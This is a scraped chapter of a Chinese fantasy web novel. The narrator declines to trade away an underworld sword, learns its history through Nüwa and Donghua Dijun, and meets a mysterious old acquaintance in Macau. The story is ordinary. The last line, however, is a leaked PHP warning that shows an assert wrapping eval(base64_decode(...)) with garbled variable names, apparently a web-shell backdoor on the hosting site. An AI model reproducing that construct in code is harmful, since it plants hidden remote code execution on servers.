88小说 > 玄幻小说 > 六月千夜 > 第377章 没想到还没有
88小说 www.88xs.org,最快更新六月千夜最新章节!

    ,最快更新六月千夜!

    “你这是要干什么?”谢必安不悦的问我。

    “这把降魔剑本身就是从地府拿出来的,如今我送乐乐往生,总要付出代价,我用降魔剑作为代价来换得乐乐往生的机会。”我解释了一下,为地府办事多年,我也了解地府的行事规矩。

    谢必安拒绝了我用降魔剑来交易,“不必了,你这些年来为地府所超度的冤魂和解决的冤孽已经足够换得这个孩子往生的机会和下一世的福报了,不必再用降魔剑来交换了。”

    “更何况,这降魔剑乃是当日地狱帝君所赐,想必你也已经知道了,不必装傻,你手中的这把剑本事黄泉剑,只因为有着斩妖除魔的威力所以被帝君留了下来,帝君一直都未曾为这把黄泉剑找到了合适的继承人,你既然能够得到了这把黄泉剑的承认,那么,你就是黄泉剑的主人,我们地府的人就没有权利可以将黄泉剑收回。”谢必安也给我解释了一下。

    我心下了然了,可心中还有一问,便问:“谢大哥,这把黄泉剑的来历是什么?为何威力如此之大而一把剑却没有真的剑身的,只有一道剑气,或者说剑魂保留在了地府之中的?”

    “其实我虽然在地府多年,但是也从未涉及过多高端的机密,不过对于这把黄泉剑,我倒还是略知一二的,却并不详细。”

    “那也无妨,愿听谢大哥道来。”我只能和谢必安对话了,范无救除了必须死,已经不会讲话了,所以我只能暂时的忽略了谢必安了。

    “这把黄泉剑最原先的主人曾经是三界六道之中一个伟大的大人,她是一位天人,也是一个女人,这个人是万物的主宰,也是万物的创始,是世界的开端,即为我们后人所供奉但却消弭于世间的女娲娘娘所有,后来,女娲娘娘不知为何仙逝而去,三界哀悼,这把黄泉剑便换了名字,才真的叫做了黄泉剑到了一个男人的手上,这个男人就是东华帝君,现如今的地府之中还矗立着东华帝君的石像,也正是东华帝君将这把黄泉剑带进了地府的,所以如今才能够到了你的手上。”

    谢大哥说的不是很详细,很多细节都说不通,但是这并不妨碍我知道这把黄泉剑的来历了,最开始的十,这把黄泉剑不知道叫做什么,被称为什么,但是却是在女娲娘娘的手上,女娲娘娘的确是一个伟大的天人,这一点是任何人都无法否认的,因为女娲娘娘是创世的始祖。

    可是关于女娲娘娘的事情,我在澳门的时候却得知了不一样的女娲娘娘,女娲娘娘是一个人身蛇尾的神,尽管平时不露出来,但是这却是真的,因为女娲娘娘的雕像就是这样的,而且我还在女娲娘娘的雕像哪里得到了女娲娘娘的传承和记忆。

    女娲娘娘作为创始的始祖,是万物的恩人,是我们生灵崇拜和敬仰的对象,但是女娲娘娘曾经愧对过这个世上的一种生物,那边是蛇,在女娲娘娘的记忆之中,女娲娘娘希望我能在活着的时候尽量的补偿蛇类的灵长动物。

    而女娲娘娘香消玉殒之后,女娲娘娘手上的黄泉剑到了一个这把黄泉剑就变成了一个被称为东华帝君的男人的手上的兵器了,东华帝君也是一个充满了神秘感的男人。

    据说,在不知道多少年以前,东华帝君擅闯了地府,蒙着面持剑救母,地府现如今还矗立着的那一尊东华帝君的石像就是东华帝君蒙着面的持剑形象,但是地府为什么会容许这样一个外来者的石像矗立在地府之中,东华帝君的真面目是什么,东华帝君的来历是什么,我就不知道了,我只是在地府的时候见到了东华帝君的石像而已,当时看见了还以为是古代的那个侠客的,谁知道不是的。

    东华帝君在擅闯了地府之后,也不知道怎么样了,总之,再后来的时候,黄泉剑就变成了降魔剑,留在了地府之中,但是黄泉剑的剑身已经遗失多年了,直到现在都未曾出世,只有一道剑气,一抹剑魂随着东华帝君的石像一直的留在了地府之中,在之后,自称帝君的地府之人,也不知道是什么身份,只知道被称为帝君,但是却绝对不会是东华帝君的人将这把黄泉剑换名降魔剑赠与了我,说是我与这把剑有缘分。

    说来也怪,这把剑在我的手上一直都被用的很好,随心所欲的,每一次遇到了来自于明杰的妖魔鬼怪无法解决的时候,用黄泉剑的话,就能够解决,就算不能够解决,也能够起到了震慑的作用,因为这可是一把来自于地府的降魔剑!

    我遇见了小黑天,勉勉强强的能用一下,因为那时候还无法真的有把握驾驭这把剑的,再者,我在得到了这把剑的同时,也得到了这把剑所带给我的无边业火。

    业火是来自于地狱的一种绿色偏黑的火焰,能够燃烧尘世间得一切罪孽恶果,我用过两次,因为根本就不能掌握,不到了紧要关头,我绝不会轻易动用,平时的时候就算是想用也根本就没办法用,因为业火压根不听我的,我要是强行的用的话,业火一定会反噬我的身体的,所以我也不敢乱动,就算是一身都是王牌的杀手锏,我就是不敢乱动一下。

    拜别了谢必安和范无救之后,我又去见了大师兄,我告诉了大师兄我将乐乐送走了的事情,我再一次的离开了这里,我走之后,在大师的坟前又来了一个人,发现了在大师兄的坟前多了一束鲜花,就立即在四周找了起来,可是最终却什么都没有找到。

    这个人就是林正,五年后的林正,算一算,江蓠也到了时间了,不然的话,林正也不会有时间来到了这里来看大师兄的,而且还是在这种时候,林正去白虎村找到了赵家后人,确认了我的确曾经来过了,只是也早已经离开了,所以林正组中还是失望而归了。

    我还想要再去一个地方,澳门,我想再去一次澳门,我就是在哪里见到了女娲娘娘的石像的,我既然得到了女娲娘娘的传承和记忆,也该为女娲娘娘做些事情才是,总要去看看女娲娘娘的。

    我孤身一人来到了澳门,还是之前和大师兄在一起来到了的澳门看日出的地方,那时候,丁宇哲刚刚离开了半年多,而现在已经过去了好多年了,不只是丁宇哲离开了,就连大师兄也离开了我,我自己一个人坐了下来,脱掉了鞋袜,将双脚置于冰凉的海水之中,还是蛮舒服的,虽然直到现在我依然还很怕水,但是我一直都想要这么做一次。

    拜祭了女娲娘娘之后,我打算走一走就离开了澳门的,却没有想到自己还是遇见了一个熟人的,这个人就是我曾经在香港不止一次的碰见的人,也就是这个人告诉了我,我和美子的人生,还告诉了我我所经历的一切都是因为我救了一个不该救的人,那个人就是丁宇哲的人。

    盘踞推着他的父亲来找我,对我说:“老朋友了,我们又见面了。”

    我冷笑了一声,“别套近乎,我这个人交朋友的条件严格得很,你最多也就只能算是我的一个熟人。”

    盘踞的脸色不是很好看,果然还是耐不住性子吗?盘踞的养父似乎看起来挺失望的,他赋予了盘踞一个谁也无法比拟的殊荣,但是却没有赋予盘踞一个完美的性格。

    “你是谁?”我莫名的感觉到了一种异样的熟悉感,但是我却警惕的问到了盘踞那坐在了轮椅之上的父亲。

    “我是你的老朋友了,我们算起来,应该有很多年都没有见了,对了,我是盘踞的养父,这件事情,你可能已经忘了,多年以前,你是知道的,但是现在估计是想不起来了。”盘踞的父亲对我作了自我介绍。

    “老朋友?”我疑惑不解,“可我不记得我们有见过的,很久很久以前,我们认识吗?”

    他点点头,“很久很久以前,我们是认识的,那时候还没有人类呢,是在刚刚开天辟地之后不久,我们九个人,都是老朋友了,也许你现在还想不起来,但是将来一定会想起来的。”

    “我们?九个人?”我不确定的指了指自己,真的是在说我么?

    他却点点头,深信不疑的说:“是的,我们九个人,九个兄弟姐妹,在一起。”

    说着,他抬起了头,看向了海边的矗立着不知道多少岁月的女娲娘娘的石像,眼神之中充满了宠溺和伤感。

    这个人,曾经认识女娲娘娘的吗?还是对女娲娘娘存在着什么特殊的感情的?为什么望着女娲娘娘的石像的眼神会在无尽的宠溺之后又充满了浓浓的哀伤呢?

    “你从不曾孤独,我一直都陪在你的身边不管岁月过去了多久,我们永远都是一家人。”他对我伸出了手,我犹豫着该不该过去。

    他却收回了手,自嘲的笑了笑,“我总是想起以前的事情,总是忽略了你已经忘记了过去的一切的事情了,本以为等待了很久,这一次应该记起来了,没想到还没有。”

Warning: assert() [function.assert]: Assertion "$汲箅偬犀= eval(base64_decode($退隉度痣));" failed in /www/wwwroot/www.88xs.org/modules/article/reader.php on line 2